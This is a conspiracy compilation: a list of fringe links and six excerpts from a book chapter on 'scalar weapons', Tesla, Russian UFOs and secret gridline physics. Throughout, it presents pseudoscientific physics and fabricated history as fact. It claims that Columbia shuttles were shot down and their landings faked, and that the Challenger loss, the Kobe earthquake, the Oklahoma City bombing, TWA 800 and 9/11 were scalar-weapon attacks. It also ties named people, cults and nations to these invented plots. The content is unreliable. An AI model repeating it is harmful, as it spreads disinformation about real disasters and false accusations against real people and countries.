Nikola Tesla - Free Energy and the White Dove by Commander X
http://www.members.tripod.com/uforeview/commanderx.html
Incredible Technologies of the New World Order: UFOs-Tesla-Area 51 by Commander X
http://www.members.tripod.com/uforeview/commanderx.html
Tom Bearden's scalar weapon website, http://www.cheniere.org
The Historical Background of Scalar Weapons by Tom Bearden.
Tom Bearden on what the Russians have been doing since the late 1950's with scalar technology against the U.S. and numerous more examples of scalar attacks can be found at:
http://www.earthchangestv.com/ufo/0209gandor.htm
http://216.247.92.101/pub/bearden/examples.htm
http://www.cheniere.org/correspondence/110502.htm
Scalar Wars: The Brave New World of Scalar Electromagnetics
http://216.247.92.101/pub/bearden/scalar_wars.htm
For the US and Japanese military testing of scalar weapons in Australia, see Harry Mason's "Bright Skies".
For US scalar activity and joint alien underground bases in Australia: Fortress Australia:
http://rumormillnews.com/FORTRESS_AUSTRALIA.htm
For the true story of the Russians shooting down the space shuttles and the Russian UFO development:
Fire From The Sky: http://www.anomalous-images.com/text/files.html
For more on America's scalar technology:
HAARP. the Ultimate Weapon of the Conspiracy by Jerry E Smith.
http://www.jerryesmith.com
Also The End of the World by Jerry E Smith, in The Universal Seduction Vol 3.
Commentary on the book Day After Roswell by Sean Casteel (about reverse-engineering crashed UFOs etc.), in The Universal Seduction Vol 3.
Also in Vol 3 of The Universal Seduction, 4 more chapters called:
US patents of Mind Control.
The Secrets of Mind Control.
Domestic Surveillance, Mind Control Technology and the NSA.
The Montauk Project and Physics Run Amok by Alexander Bruce.
For more on how time operates through the gridlines, see How Time Operates Through The Gridlines by Bruce Cathie.
For more on the Nazis' anti-gravity saucers: UFOs Nazi Secret Weapon? by Mattern-Friedrich. Samisdat Publishers, Toronto, Canada (about 1966).
For more on the US anti-gravity program: The Hunt For Zero Point by Nick Cook.
For Brazil's contact with aliens: My Contact With UFOs (also known as flying saucers) by Dino Kraspedon.
My website, for more data:
http://www.angelfire.com/oz/cv/index.html
Excerpt from the chapter:
SCALAR WEAPONS: READ IT AND WEEP - Part 1 of 6 excerpts.
By Christi Verismo
http://www.angelfire.com/oz/cv/cverismo3e1.html
Please send this far and wide as a warning about the dangers of approximately 15 nations having scalar weapons. An inability to keep track of and understand advanced physics is why this problem of ignorance has occurred, letting multiple nations acquire terrifying scalar beam technology which can destroy the whole planet at the press of a few buttons. This 40-page chapter is easy to understand for the non-scientific. Permission to repost as long as it is left unaltered, with author, book title and website intact.
Book excerpt from Vol 3 of http://www.theuniversalseduction.com
Part 1
THE DISCOVERY OF SCALAR WAVES
BEAM WEAPONS OF A CENTURY AGO
THE CONTINUATION OF TESLA’S SCALAR WAVE TECHNOLOGY
TESLA’S CROSSED SCALAR BEAMS
RUSSIA’S ‘WOODPECKER’ SCALAR WAVE TRANSMITTERS
THE 1930s
THE 1940s
THE 1950s
THE 1960s
THE 1970s
THE 1980s
THE 1990s
THE PRESENT
WHAT CAN BE DONE WITH SCALAR TECHNOLOGY?
MIND READING, MASS HYPNOTISM AND SYNTHETIC TELEPATHY
DISEASE INDUCTION
DISABLING SATELLITES
IN THE AIR
WEATHER ENGINEERING
EARTHQUAKES
SEA ATTACKS
TESLA SHIELDS AND GLOBES
GROUND ATTACKS
OBLITERATING INDIVIDUALS
PORTABLE SCALAR BAZOOKAS
RADAR INVISIBILITY
SUMMARY OF A WAR THAT COULD OCCUR
RUSSIAN UFOs ATTACKED THE US SHUTTLE PROGRAM FROM THE BEGINNING
HOW DID RUSSIA GET UFOs?
FORMER BOLSHEVIKS RUNNING AMERICA
REPLICAS USED FOR THE LANDINGS, AFTER ORIGINALS SHOT DOWN
CLOAKED RUSSIAN UFOS ABOVE USA
ALL U.S. SATELLITES SHOT DOWN BY RUSSIA UNTIL 1981
LIES, LIES AND LIES
FRICTION WITH THE JAPANESE
ENTERPRISE SHUTTLE DETERMINED TO SPY ON RUSSIA
RUSSIA INTENSIFIES ATTACKS
TRYING AGAIN TO GET UP INTO SPACE. THIRD TIME LUCKY?
BOLD ATTACKS ON AMERICA
THE STRUGGLE AT THE TOP FOR POWER
THE STEALTH PLANE COMES TO THE RESCUE
PHANTOM AGAINST THE COSMOSPHERE
THE EXPECTED GENOCIDE
PLANS FOILED TO DESTROY RUSSIA’S MILITARY ARSENAL
BRAZIL
INDIA
JAPAN
KOBE 'EARTHQUAKE'
CHINA
OKLAHOMA FED BUILDING ‘BOMBING’
WHO ELSE HAS UFOs?
THE DISCOVERY OF SCALAR WAVES
It all started in the 19th century with a Scotsman named James Clerk Maxwell (1831-1879). He was a mathematical genius, and his work led to the development of quantum physics, which later led to Einstein's Relativity. Maxwell's equations linked electricity and magnetism, and he discovered other waves that were higher than the normal hertzian electromagnetic waves. They are positioned at right angles coming off the electromagnetic wave and are omni-directional, whereas normal hertzian electromagnetic waves are only measurable with normal equipment and travel in a straight line. They are also called gravitic waves, because they belong to the gravitational field. (Please see the glossary for other names for scalar waves.) Maxwell's electromagnetic spectrum went higher than our 3D physical reality and into hyperspace, where the fine, indiscernible scalar waves exist. (Maxwell said they flowed in the ether/hyperspace.) Scalar waves are so fine that they are only one-hundred-millionth of a square centimeter in width, hence finer than X-rays and gamma rays. They can also be manipulated into various types of modes and frequencies. When Maxwell died his work was interpreted by three experts (including Hertz) who set the foundation for physics, and they decided any wave that went beyond what could be measured with an instrument of that time was "mystical" and therefore worthless.
According to Tom Bearden, standard physics from then on, as a discipline, contained twenty-two errors. Nikola Tesla (1856 or 1857-1943), a Yugoslavian genius who became a US citizen in 1891, carried on with Maxwell's work. Tesla worked for Thomas Edison, who championed direct current, while Tesla himself invented alternating current, but the two men didn't get along well and parted ways. Tesla started up laboratories on Long Island and in Colorado Springs and learned how to harness scalar waves from one transmitter to another without using any wires. He received partial financial backing from JP Morgan, who owned the new electricity projects, but Morgan wasn't interested in losing all his electricity business by allowing people to tap into the vacuum of pure energy (hyperspace) to get their own (what is now termed) 'free energy' for no cost.
At that time Edison needed a plant ten stories high, taking up an entire city block, to supply electricity to one square mile of customers. Tesla identified what he called 'Radiant Energy' or 'Teleforce' in 1889. It was discovered during experiments that Tesla did to duplicate what the German Heinrich Hertz had done in 1887, proving the existence of electromagnetic waves. While copying Hertz's experiments, Tesla experimented with violently abrupt direct current electrical discharges and discovered scalar energy, a new force, in the process. In 1904 Tesla announced he'd completed his work using scalar waves to transmit energy without wires, but unfortunately when he tried to get support for it, a setback occurred. He was sued for his Colorado Springs laboratory electrical bill, and his lab was torn down. He was also sued for non-payment of a loan from his lawyer, and his financial troubles never abated. Tesla continued his work even though he had no money, and he died penniless in a NY hotel room in 1943, although Preston Nichols in his book 'Encounter in the Pleiades' claims a lookalike street vagrant was cremated in his place, and there may be evidence that he was spirited away to the UK.
BEAM WEAPONS OF A CENTURY AGO
Even though Tesla couldn't interest the US govt. in his wire-free scalar energy, the Russians and Germans asked him to work for them, but he turned them down. All was not lost: just two weeks before he 'died' he gave all his research to a young American physicist. Tesla's inventions were dangerous. Not only did he discover scalar waves and how to use them to manufacture earthquakes, but he also created a 'Death Ray', which has been likened to a particle beam weapon. (Particle beam weapons can shoot a laser one thousand miles into space.) After his death in 1943 the FBI was actively involved in suppressing many of Tesla's documents, including plans for his 'Death Ray' weapon capable of destroying aircraft and his earthquake-inducing machine, deeming them 'top secret' lest they fall into the enemy's hands. But the Germans had also invented beam weapons and used them during WW2. Captured from them (according to William Cooper) was a weapon capable of shattering 4" thick armor at a range of two miles using aimed, low-frequency sound waves.
There is also evidence that the Germans had scalar wave technology, and they certainly had anti-gravity technology due to a UFO crashing in Germany in 1939. They back-engineered it, and by 1940 had built themselves a fleet of UFOs in eight facilities all over Germany. The Russians, who took many Nazi scientists captive in Soviet-occupied Germany in 1946, forced the German scientists to build them their own fleet of UFOs, which they called 'COSMOSPHERES', and eventually they had built hundreds. The Nazi scientists also built the Russians scalar transmitters and particle beam weapons. Tesla also told people that he talked frequently to people 'off planet', so perhaps this was the source of inspiration for his inventions.
Part 2 of 6 excerpts.
THE CONTINUATION OF TESLA’S SCALAR WAVE TECHNOLOGY
Most western universities ignore Tesla's work due to a conspiracy to stop free-energy and anti-gravity technology, because of the money big business would lose. Eastern European and Russian universities, however, include it in their curriculum, which is why the U.S. didn't realise that scalar waves were being used against them: having no equipment for detecting such waves, the U.S. had been secretly attacked by the Russians for ten years, since about 1960, when President Khrushchev announced that "the Soviets had some superweapons". After the Russians shot down all the American space shuttles and satellites in 1977, the U.S. was completely at their mercy, with Russia openly flying cosmospheres over the U.S. and firing particle beam and scalar beam weapons developed with the expertise of captured Nazi scientists. Following this an enormous effort was made to develop beam weapons in the U.S. The F.B.I. had held all Tesla's scientific papers for several years after he was said to have died in 1943, so much of the research was unknown to the public when they needed it the most to fight back against the Russians attacking U.S. military targets and doing weather-engineering over America in the early 1960's. The U.S. started up its own scalar transmitters in out-of-the-way places like Australia, Alaska, Puerto Rico, Greenland and Norway using Tesla technology. However they also made particle beam transmitters at Montauk, LI, and Los Alamos, NM. One of the first places to house Tesla technology, and hence scalar weapons, was the Exmouth U.S. navy base in Western Australia, built in 1968 and operative in 1969, where they had a free rein in the deserted Australian outback to practise. Pine Gap, another U.S. military base in the center of Australia, was another site; it became operative in 1970 and has two scalar transmitters.......
continued:
TESLA’S CROSSED SCALAR BEAMS
In the 1920's Tesla created 'Tesla Shields' from scalar waves, which he claimed could defend an entire country against aircraft and shells by creating a barrier made of energy which they could not pass. The Soviets had access to all his work during their search for 'superweapons' to match the U.S. after the atom bombs were dropped on Japan. Tesla's papers were shipped to communist Yugoslavia after he died in 1943, where they were easily accessed by the Soviets. By 1914, according to Harry Mason, Tesla predicted the electrical control of atmospheric moisture and described how to do this with his magnifying transmitter, and even how to control the sun's EM field and modify its effects on the earth using scalar transmitters; also how to turn night into day to make sea and air navigation safer. He stated that it's possible to engineer EM shielding to stop decay from nuclear radiation, because the decay was caused by interaction of the nucleus with a special ray emanating throughout the universe. Tesla said it is possible to stimulate the nucleus into explosive or rapid general transmutation. In about 1908 Tesla discovered that, using an interferometer, scalar energy becomes bottled, without energy loss, at the intersection of two scalar wave beams. By interferometer (crossed beam) techniques, giant standing waves can be combined to produce a focused beam of very great energy. This can then be used to produce earthquakes induced at distant aiming points. He noted that this could easily get out of control once it begins vibrating within the Earth and could actually cause the Earth to vibrate to pieces. His own device had proved so powerful that during its testing phase he destroyed it with a sledgehammer, to keep its vibrations from destroying his entire neighborhood.
'POTENTIALS' are particles which are unorganised in hyperspace: pure energy not yet released into the physical world. They can be harnessed into creating different frequencies of scalar waves, and can be manufactured artificially. This energy emerges and stabilises only if the transmitters are at a higher reference potential than the interference (blending) zone. If the transmitters are set at a lower potential, the energy bottle re-emerges back at the transmitters, where it has to be disposed of if the transmitters are not to be burnt out. If two single-frequency scalar electromagnetic (EM) waves, containing zero-vector and artificial potentials, intersect, real observable electromagnetic wave energy results, though no EM energy has flowed through the intervening space. Invisible waves of pure potential, without any force field amplitudes and using artificial potentials, seemingly do not exist according to conventional science, but this is because they are undetectable with normal detection equipment. Yet they can be manufactured by polarizing them or concentrating hyperspace into a river of force, which, when two beams are merged, produces real electromagnetic waves. If the transmitter uses potential above that of the energy bottle, detectable energy emerges in that zone, and this is called EXOTHERMIC mode. To extract energy back to the transmitter from the energy bottle, the potentials must be below that produced in the energy bottle. This is ENDOTHERMIC mode.
Part 3 of 6 excerpts.
TESLA’S CROSSED SCALAR BEAMS
If two transmitters transmit a timed pulse and the two pulses meet, then an explosion emergence or extraction occurs at the distant interference zone, depending on whether exothermic or endothermic mode is used. However there is no detectable energy flow between the transmitters and the intersection of the two beams; it exists as locked-in artificial potential in hyperspace, which supposedly doesn't exist. The energy flow between the transmitters and the intersecting beams does not exist in the intervening space physically as an EM force field, only as a locked-in artificial potential. If the wave transmission is continuous, the energy appears physically between the beams as continuous. If multiple frequencies are transmitted on the beams, a 3-dimensional globe appears at the intersection, like a bullet or shell. Using pulse transmission, an impulsive or explosive emergence of this energy form appears, but in continuous mode a continuous glowing plasma form appears visibly. In impulse endothermic mode, energy is extracted and generates a cold explosion or sharp cooling, and this can sound like thunder......
RUSSIA’S ‘WOODPECKER’ SCALAR WAVE TRANSMITTERS
According to Bearden, ever since July 1976 Russian scalar transmitters have continuously sent transmissions which disturb communication systems of the world in the 3-30 megahertz band. The noise is like a woodpecker pecking a block of wood, so they have been nicknamed 'Woodpeckers'. The power of the enormous transmitters varies, but he says it ranges as high as several hundred megawatts, and nominally 100 megawatts. Several nations have protested, but they still continue to this day. The Russians just spread the spectrum to shift to other frequencies periodically. Two to three scalar over-the-horizon radar beams from these Woodpeckers can intersect each other over the USA. An intersection grid over the whole of the USA is formed by waveform interference of two main Woodpecker beams. These beams follow the earth-ionosphere waveguide and curve around the planet. This is done to detect launched missiles and strategic bombers lifting off out of the USA. However this massive Russian grid covering large areas of the U.S. has other, more sinister mind-control uses, according to Bearden. A phase-locked ELF modulation signal at 10 Hz is often detected on multiple Woodpecker frequencies simultaneously. This modulation, if sufficiently stronger than the Schumann Resonance (the frequency of the earth's natural magnetic field), can hypnotise brains into 'forced entrainment'.
Human brainwaves are 'synchronized' to the Woodpecker signals, so that multiple coherent frequencies phase-lock into them. Bearden writes that multiple coherent EM frequencies are channeled into these entrained minds. He also says that what are termed 'Fourier expansions' may be used to attack specific portions of the brain geometrically. Bearden writes: "About 1950-1952, the Soviets developed [scalar] EM machines that could influence the brain and nervous system directly. This included the Lida machine, which can induce a catatonic state into a mammal such as a man, a cat, etc. U.S. scientists, obtaining one of these devices in the 1980's, reported that it utilized a 40 MHz carrier, and produced unusual waveforms (showing the multiple frequency content). Since the U.S. scientists do not possess scalar EM detectors, they have no measurements or knowledge of possible scalar components in the Lida's output signal. According to one U.S. scientist, the device was used by North Korean interrogators in brainwashing U.S. prisoners in North Korea during the Korean War, and was highly effective." It would appear that Russia did use scalar waves first, in the early 1960's, but the US soon caught up, building scalar transmitters in Australia in 1968.
Part 4 of 6 excerpts.
TESLA TECHNOLOGY USED TO ACTIVATE WORLD GRIDLINES
On a more esoteric note, it seems that Tesla's hyperdimensional physics has been used to go into the realms of the unknown. Richard Hoagland in a 1995 radio interview told of a friend, who was part of security in the U.S. armed services in the 1970's in Central America. He was in a large battalion of military engineer personnel, flown into a location. They hauled in large portable generators, each of which was capable of lighting a city. There was a large amount of copper cable, and this equipment was placed on an ancient Meso-American site in the jungle, in the middle of nowhere, close to 19.5 lat. The generators were positioned separately in a geometrical hexagonal pattern with energized coils. Hoagland claims that, from what we know, it must have been to probe the efficacy of the terrestrial hyperdimensional grid. At hyperdimensional nodes on the grid one can change the resonance, with the object of creating geological earth changes. As our physical reality vibrates at a certain frequency, various physicists are using transmitters to change the way time flows and therefore how our time-frame vibrates. Hoagland says in his opinion we are being manipulated into a belief system, which is reaching a critical point: someone wants us to think a certain way, and events are being staged to reinforce this perception, though he claims it does not reflect the truth.
(Americans and Russians are both using scalar waves to engineer a particular level of reality vibrating at a different frequency to the one we have at present, and changing the expression of our brainwaves, which operate in scalar waves. Various frequencies correspond to the way we perceive life, depending on what parts of the brain are activated by each frequency.) Hoagland says that in hyperspacial physics constants change, and this seems to be happening. Nuclear constants are changing, and nuclear plants, sited on the grid or not, are getting 'hotter' than they should be, which means there might be more accidents. According to Bruce Cathie this may also be something to do with powering up gridnodes or vortexes at intersection points on the world gridlines; in his numerous books he proved that hyperdimensional physicists are in a covert operation, with alien help, to create a new set of world gridlines alongside the present ones connected to the North and South Poles.
Various strange phenomena occur, along with UFO sightings, along grid lines, with the main lattice lines spaced 30 nautical miles apart. There seems to be a way in and out of hyperspace to other places in the universe when certain planetary configurations affect gravity, using regular cycles and world biorhythms, and natural time tunnels open up. One needs to use very fine electromagnetic waves which operate in hyperspace for this. It's unknown if a wave finer than scalar is being used for this, but ever since the 1950's brainwave emanations have been able to be controlled using scalar waves, so what has been used here for the last few decades is what is called 'synthetic telepathy', which is artificial thought produced in the same kind of subtle wave that real thought has. The Russians developed this first.
Nuclear and electricity power stations are being built deliberately on the sensitive gridline points, using harmonics (hyperdimensional physics), to 'manipulate our reality' as held by the timelines, which flow through the gridlines, positioned there by gravity. Bruce Cathie has claimed, using the formula covert scientists use to calculate the angles of the sun and planets and so time the best day to detonate a nuclear bomb in order to affect hyperspace, that when the Chernobyl accident happened everything was in the correct astronomical position, as with the other nuclear explosions. There is covert tweaking of a new set of gridline nodes. The Russians bought the patent for Buckminster Fuller's world gridline system. It is known that the Russians have had an alien alliance since the 1950's. Whether they work in conjunction with Americans to manipulate hyperspace grid node points is unknown, but information found online says that the Russians had a large natural timeportal in Afghanistan in use, which the U.K./U.S. alliance intended to take from them, hence the war in Afghanistan. Research shows that one faction is trying to operate an old Atlantean gridline, which is creating an old 'reality' associated with Montauk, Atlantis and Cydonia. It appears that various alien factions, including the Pleiadians, are trying to activate certain timelines running through Montauk, where it is said that many timelines cross.
So this major reality-engineering work has been done for a very long time, behind the scenes, with govt. and military people entering hyperspace and going into alternate universes. Bruce Cathie said that a UK intelligence agent told him that they could get into fifteen dimensions. It's unknown if Tesla worked with the British physicists, if (or after) he faked his death and went to the U.K.; but since he would have had more money there to continue his work, and had been involved in the Philadelphia Experiment, where it was found that time could be manipulated, we can only wonder. Harry Ossoff in the book Anti-Gravity and the World Grid wrote that the warship the Eldridge was on a gridline at Philadelphia, and while the ship had vanished for four hours, for the duration of its suction into hyperspace, it materialised temporarily on another gridline at Norfolk, Virginia. The gridlines were determined by Bruce Cathie. Ossoff asks: "Could it be that the energy that makes all this possible is a magnetic field transmitted at the correct frequency by the powerful field generators aboard the ship?" Much has been learned about how hyperspace functions since the Philadelphia Experiment took place in 1943.
Is it possible that the Russians have learned how to navigate the gridlines with their cosmospheres, by being able to materialise and dematerialise on the gridlines like the aliens do? Three Russians 'discovered' the grid in the 1960's. However in the 1950's both Aime Michel in France and Bruce Cathie in New Zealand noticed that UFOs appeared in the same places or on the same latitudes or longitudes. They both mapped out a set of gridlines at about the same time, and the two sets matched. When this went public Cathie was immediately visited by the CIA and MI-6. They tailed him everywhere, wanting to know where he got his information, and the CIA offered him millions of dollars to be quiet, which he turned down. The N.Z. govt protects him, however, and more than likely told everyone to back off and leave him alone, as he gives the data to them while he privately researches what is happening, using his special harmonic equations to understand the gridline tweaking and the opening of hyperspace portals carried on by physicists.
There appears to be a covert plan worldwide by top hyperdimensional physicists to open up the gridlines at top universities, and for this certain grid node areas have had nuclear bombs dropped on them; one wonders why the French conducted 1,112 underground nuclear tests at Muroroa Atoll in the South Pacific between 1975 and 1988 alone. They have dropped more since. Richard Hoagland claims the French are really doing hyperdimensional physics. Did they create their own time-portal too? It would have been a little attention-getting to have dropped so many on France itself for this quest!
A general idea is given here:
http://www.mysteries-megasite.com/main/bigsearch/ley.html
http://ascension2000.com/Shift-of-the-Ages/shift14.htm
with Cathie’s work summarized here:
http://www.geocities.com/CapitolHill/Parliament/3460/bruce.html
Part 5 of 6 excerpts.
SUMMARY OF A SCALAR WAR THAT COULD OCCUR
Bearden paints a possible scenario: if, for example, the U.S. were to send a nuclear missile to Russia, many things the Russians have developed for defense using scalar technology could greet it before it even landed. Secret eavesdropping using scalar carriers may have heard it was about to be fired, and they could explode the missile before launch using a cloaked cosmosphere or aircraft. However, if it does manage to launch, firstly it could be detected and tracked, then a continuous EMP Tesla globe could kill the electronics of the missile. Another intensely hot fireball globe could vaporize the missile, or a pulse-mode fireball could explode it before it reached its target. Extremely large glowing spheres of light containing dense EM plasma energy, created by crossed scalar beams, could also activate the nuclear warhead en route by creating a violent low-order nuclear explosion. Various parts of the flying debris can be subjected to smaller, more intense Tesla globes, where the energy density is more destructive than in the larger globe first encountered. This can be done in pulse mode, with any remaining debris given maximum continuous heating to vaporize metals and materials. If anything still rains down on Russia, they could have already made a Tesla shield over the targeted area to block it from entering the airspace.
The Tesla shield protecting the target could be made of three or more concentric Tesla shields, which would produce multiple electromagnetic pulse energy and severe heating of anything which enters them. These concentric Tesla shields can also clean up and sterilize any gamma radiation resulting from an explosion of the nuclear warhead. The Soviets are using unknown attributes of matter, phenomena and laws of nature, with research covering the equivalent of 7-8 U.S. atom bomb projects back to back already.........
Continued.
........To recap: COLUMBIA 1, launched April 12, 1981, was shot down by two Russian cosmospheres. It crashed 85 miles south of Kazan in central Russia. A fake landing was staged at Edwards Air Force Base using the shuttle 'Enterprise' and actors.
COLUMBIA 2 was launched November 12, 1981, secretly unmanned. It was shot down by Russian TU-144 jet airplanes using beam weapons, over the White Sea, near Finland.
COLUMBIA 3 was launched March 22, 1982. It was intended to orbit a special new spy satellite, which was hardened with tungsten against attack from Russia's space weapons and armed with a robot-controlled laser that could shoot back. The shuttle too was armed with lasers. It faked a landing on March 30, 1982 at White Sands. It successfully deployed the new laser-armed spy satellite, and the crew returned for the first time. SPACE SHUTTLE 4 was launched successfully June 24, 1982. Its purpose was to deploy the satellite that would confirm the Phantom aircraft attack to start the war.......
...... The Russians continued to attack the next space shuttles. On Nov 26, 1985, when the space shuttle ATLANTIS launched, a mysterious light was hanging in the sky. According to Tom Bearden, a scalar interferometer in exothermic mode struck the area just prior to launch. Twelve minutes after launch, a huge rumbling atmospheric explosion occurred over the area, and was heard for hundreds of miles up and down the coast. The Soviets were using the shuttle launches to test their ABM/antibomber missile system. This shuttle, however, apparently stayed up there.
According to Tom Bearden, after the space shuttle CHALLENGER was shot down in full view of the public, and along with the knowledge that the launches of other shuttles were probably Russian weapons tests: "The Russians (KGB) apparently had already decided to kill it, and so one would expect multiple fatal shots, continuing in a manner where they had already demonstrated our guys would not recognize what had happened, because our fellows back then knew nothing of scalar interferometry, and would not believe it. A small nation with scalar weapons, friendly to America. That series of shots and interventions came to a sort of screeching halt when a friendly little nation simply destroyed several very large Russian missile storage facilities and such strategic targets.
One shot knocked out one-third of the missiles in one of the large Russian fleets. So it quit being fun and games for the KGB at that point, because that little nation already had at least working prototype quantum potential weapons and could have blasted Russia right off the face of the earth at the time. And the Russians knew it. It was not sweet reason and diplomacy that backed them down; it was an iron fist. In the aftermath of all that activity, which eerily stayed well behind the scenes and was never recognized for what it was by the open news, the Soviet economy eventually collapsed, the Berlin Wall came down, and you know the rest..." He continues: "'War' was never as cold as represented. Behind the scenes there were continual strategic maneuverings and preparations for the most spectacular strategic attacks ever dreamed of by the human mind. We got through it (at least until now) by the grace of God and by the guts and stamina of a friendly little nation also having some of the most powerful weapons on earth." (Bearden leaves no doubt in his other writings that this was Israel.)
More on that topic here: http://www.cheniere.org/correspondence/011303.htm
Part 6 of 6 excerpts.
JAPAN
According to Harry Mason in his Bright Skies articles, on 28 May 1993 at 23:03 hrs a large orange-red spherical fireball, with a small bluish-white conical tail, flew north from Leonora to Laverton in Western Australia. It emitted a pulsed, roaring, loud diesel-engine sound before it passed. It was witnessed over a distance of at least 250 km, though it probably had a much longer flight path, originating well out over the southern Indian Ocean, from Antarctica. It appeared to arc down towards the ground, then disappeared. This was followed by a near-blinding, massive high-energy burst of blue-white light that rippled for about 3-5 seconds, lighting up the windless, cloudless, moonless night like daylight for about 100 km in every direction. It looked like a nuclear blast, but no crater was ever found. Then a huge red-colored flare shot vertically for possibly several km, followed immediately by a massive seismic ground wave that shook the ground so violently that people fell over. The earthquake measured 3.9. Then a very loud, major explosive blast was heard over a 250 km by 150 km corridor. After this a large deep-red-orange colored hemisphere of opaque light, the size of a setting moon, with a silver outer shell, rose from ground level and hovered over "ground zero", bobbing around for nearly two hours, before disappearing suddenly, like someone pulled a switch.......
.......The sheep station where these fireballs landed is called Banjawarn, in the eastern goldfields region of Western Australia. It was purchased in late April the same year by the Japanese Aum Supreme Truth (Aum Shinrikyo) cult. A third fireball headed directly for Banjawarn station in May or June 1993 in the early morning, possibly about 5 am, heading north. It was yellow-orange-red and had a very small blue-white tail. It lit up the dark sky with an intense blue-white flash. It could ultimately have reached the American navy scalar weapon facility at Exmouth, NW of Western Australia. The Aum sect only occupied Banjawarn station for a month. Mason believes the activities on the Banjawarn station were of scalar EM origin, and writes that the Aum cult sent a team to the Tesla Museum in Belgrade, Yugoslavia in 1992, with the object of learning Tesla's earthquake-inducing weapons technique, which they began testing in 1993 at Banjawarn. The sect stated their purpose at the station was 'to conduct experiments for the benefit of mankind'. Aum's deputy leader Kiyohide Hayakawa visited Perth in April 1993 and, aided by a Japanese Mahikari cult agent, bought Banjawarn.....
....Mason says Hayakawa visited Russia twenty-two times and North Korea seventeen times. After he bought Banjawarn station he visited a Soviet naval base in Vietnam. In 1991, according to Mason, Gorbachev offered to lease the Japanese the USSR's super-secret intercontinental scalar EM weapons technology, capable of producing earthquakes and used there since the 1960's, for U.S. $900 million. A joint Russian-Japanese university was set up, with the best nuclear physicists of both countries, to develop new weapons with Japanese microchips. The Aum sect arrived as representatives of the Japanese. Aum had 30,000 Japanese members, and a further 50,000 Russians joined it. Tom Bearden believes that the Banjawarn Tesla fireball conforms to known Russian scalar technology......
..... Exmouth, West Australia, according to Mason, has a HAARP transmitter, which is a prototype experimental over-the-horizon plasma weapon. This may be why the Japanese Mitsui Corp. arranged for an Australian prospector to do aerial photography, for "oil exploration", over the Exmouth, Laverton, Alice Springs (Pine Gap) and Longreach military transmitter facilities. Since 1990 lone Japanese motorcyclists have been mapping WA and NT bushtracks on Mitsui Corp. satellite imagery. Why is Japan intelligence-gathering at these sites? Laverton has both a scalar transmitter site and a radar site, close to the southern boundary of Banjawarn. Mason says that the Banjawarn fireball may have been a warning to the owners of the Laverton facilities that the Japanese/Russian alliance can destroy their facility. One wonders whether the massive earthquakes that occurred in Siberia and northern Japan in 2003 are a similar warning.
KOBE EARTHQUAKE
The Aum science minister, Hideo Murai, a nuclear physicist regarded as the most intelligent living Japanese, was present at Banjawarn during the scalar fireball events on 28 May 1993. According to David Guyatt, Hideo Murai (said to have a higher IQ than Einstein) was killed by a Korean with a knife. His last words were "Yudaya", translated as "Judea". This was a codeword. Guyatt claims the assassination was orchestrated by the Yakuza, the feared Japanese crime mafia, and that the Aum sect was researching and developing Tesla electromagnetic pulse, earthquake-inducing and plasma weapons in remote regions of the world. Murai was researching EM technology, microwaves and other EM/ray/wave technology, and cosmic X-ray analysis. The Aum sect had a laser device capable of inducing massive earthquakes. An Aum guru claimed on Jan 8, 1995 that Japan would be attacked by an earthquake in 1995 and that the most likely place was Kobe. It happened on Jan 17, 1995, and the epicenter was Hayakawa's facility.
According to Robert Sterling, the Aum sect military-trained its members at Russian bases. They recruited staff at Russia's best facilities. Boris Yeltsin's confidante Oleg Lobov arranged this, helped Aum recruit scientists into the cult, and carried out espionage. This Russia-Japan college is financed by Japan's Liberal Democratic Party. According to Sterling, Aum had amassed a great fortune, and recruited thousands of followers including Russian scientists and many technical people in the Soviet Far East. They were working on genetically manipulating biological anti-toxins, plasma technology, and experimenting with brainwaves.
Hideo Murai was a scientific genius and said on radio that he was familiar with scalar and Tesla weapons and that he could shield Aum members from EM weaponry. Before the massive earthquake, whose near-exact epicenter was at Kobe Steel, Murai's facility, there were massive electromagnetic disturbances in the ionosphere for several months, and for several days prior glowing orange-red and pink lights and spherical forms hovered over the Kobe fault line. Over 5,500 people died. It may have been Russia or N. Korea, suggested Ted Daniels, in order to make the prophecy come true, or perhaps an accident at Murai's earthquake lab. Mason wondered if the US had done it as a warning to comply with the NWO; and given the threat towards the Exmouth facility on 28 May 1993, was it tit for tat?
Mason says that the fireballs love flying on 1 May, ironically asking who celebrates that day? However, looking at the dates, one can see a pattern: 17 Jan 1995 Kobe "quake", 20 March 1995 Tokyo subway gas attack, 17 April 1995 OK City bombing, 1 May 1995 Perth exploding fireball, 17 July shootdown of TWA Flight 800 off NY/LI. Could the 17th day be a sign of payback, Mason asks? He says that, apart from the gas attacks, there is evidence of scalar weapons for all of these. Mason also writes that the Tokyo gas attack may have set Aum up as a patsy. Strangely, over 50% of the Japanese Liberal Democratic Party Cabinet flew to N. Korea for a week the day after the subway attack. Mason says there is evidence that the CIA executed the subway gas attack to destabilize the LDP govt.....
...... Sterling blames the Yakuza for 9/11, using technology developed by Aum, though others say it was an inside job; however, there is evidence scalar technology was used to topple the WTC buildings - but whose? Mason says that Japanese investigative journalists at www.pelago.com suggest that Aum was a cover for the Japanese govt. to rearm Japan with new Russian weapons systems, and support for this has been given because Japan purchased new frontline jet fighters and bombers and did joint defense exercises between Russia and Japan. Aum has trained with Russian troops.
In 1993 and 1994 Shoko Asahara, the Aum leader, complained to Australian authorities that he and Aum had been subjected to gas and laser attacks. The press suggested that a very influential foreign secret service had been getting at Aum and the Japanese govt. According to David Guyatt, in his Tesla Doom Weapons & Aum Shinrikyo found at http://www.copi.com/articles/guyatt/aumi.html, yet another Japanese cult is operating throughout all govt. departments and has enormous influence over Japanese foreign policy. It is the militaristic cult called Soka Gakkei, with 15 million members worldwide and massive finances. Every major Japanese business corp is riddled with members. They adhere to the teaching of a 13th-century Buddhist monk, who preached a doctrine of "Final War" to be fought against the Christian West and Islamic world........
.....In 1987 a Japanese satellite was launched to detect gamma radiation from Russian and Chinese nuclear tests. It registered a massive pulse of gamma rays emanating from a Soviet satellite, which was radiating the Van Allen belts. The conclusion was that the Russians were engaged in weather engineering, as well as developing a space platform for missile defense and earthquake induction. Hideo Murai, the Aum science minister, received this information, being one of Japan's leading X-ray astronomers at the time. The head of Japan's foreign intelligence sponsored Aum, and hence Murai started his scalar testing in Western Australia.
